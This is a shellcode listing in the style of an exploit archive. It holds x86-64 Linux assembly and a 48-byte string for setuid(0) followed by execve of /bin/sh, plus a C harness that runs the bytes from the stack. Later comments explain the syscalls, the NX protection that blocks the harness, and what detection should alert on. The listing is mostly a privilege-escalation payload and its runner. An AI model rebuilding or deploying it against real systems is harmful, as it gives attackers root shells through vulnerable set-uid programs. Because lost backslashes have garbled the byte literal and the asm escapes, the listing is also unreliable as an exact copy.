# Title : linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes
# Published : 2009-05-14
# Author : evil.xi4oyu
/*
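setuid(0) + execve(/bin/sh) - just 4 fun.
Reading note: the inline assembly below is the source of the byte string in
main(). It makes three syscalls, selected by the value loaded into %al/%rax:
0x69 (setuid, argument 0), 0x3b (execve of "/bin/sh") and 0x3c (exit with
status 1, reached only if execve returns). The 0xff low byte of the movq
constant is filler that the following shr discards, leaving "/bin/sh" plus a
terminating zero in %rbx. The trailing "nt" on each quoted line is what
remains of a "\n\t" escape whose backslash was lost when this page was
extracted.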
xi4oyu [at] 80sec.com
main(){
__asm( "xorq %rdi,%rdint"
"mov $0x69,%alnt"
"syscall nt"
"xorq %rdx, %rdx nt"
"movq $0x68732f6e69622fff,%rbx; nt"
"shr $0x8, %rbx; nt"
"push %rbx; nt"
"movq %rsp,%rdi; nt"
"xorq %rax,%rax; nt"
"pushq %rax; nt"
"pushq %rdi; nt"
"movq %rsp,%rsi; nt"
"mov $0x3b,%al; nt"
"syscall ; nt"
"pushq $0x1 ; nt"
"pop %rdi ; nt"
"pushq $0x3c ; nt"
"pop %rax ; nt"
"syscall ; nt"
);
}
*/
/*
 * Test harness for the byte string: stores it in a local char array and
 * calls the array as if it were a function taking no arguments.
 *
 * As printed here the literal is damaged. Each byte was written as a
 * "\xNN" escape, but the backslashes were lost in extraction, so this
 * listing holds the ASCII text "x48x31xff..." rather than machine code.
 * The listing shows 48 byte values; the 49 in the page title presumably
 * counts the string's terminating NUL (not confirmed by the page).
 *
 * Defensive reading:
 *  - shellcode[] is an automatic array, so it lives on main()'s stack.
 *    The call depends on that memory being executable; where the stack is
 *    mapped non-executable (NX/DEP), the call faults instead of running.
 *  - Per the assembly in the comment above, the behaviour to watch for is
 *    setuid(0) followed directly by execve of /bin/sh in the same process.
 *    setuid(0) succeeds only if the process is already privileged to
 *    switch to uid 0 (for example a set-uid-root program whose effective
 *    uid is 0), so a shell exec'd right after it by such a program is the
 *    event worth alerting on.
 *
 * main() is declared without a return type (implicit int) and returns no
 * value, which is pre-C99 style.
 */
main() {
/* One byte per instruction-stream byte, in the order the assembly emits them. */
char shellcode[] =
"x48x31xffxb0x69x0fx05x48x31xd2x48xbbxffx2fx62"
"x69x6ex2fx73x68x48xc1xebx08x53x48x89xe7x48x31"
"xc0x50x57x48x89xe6xb0x3bx0fx05x6ax01x5fx6ax3c"
"x58x0fx05";
/* Casts the array's address to a function pointer and calls through it.
   Converting an object pointer to a function pointer is not defined by
   ISO C; this relies on the platform treating both as plain addresses. */
(*(void (*)()) shellcode)();
}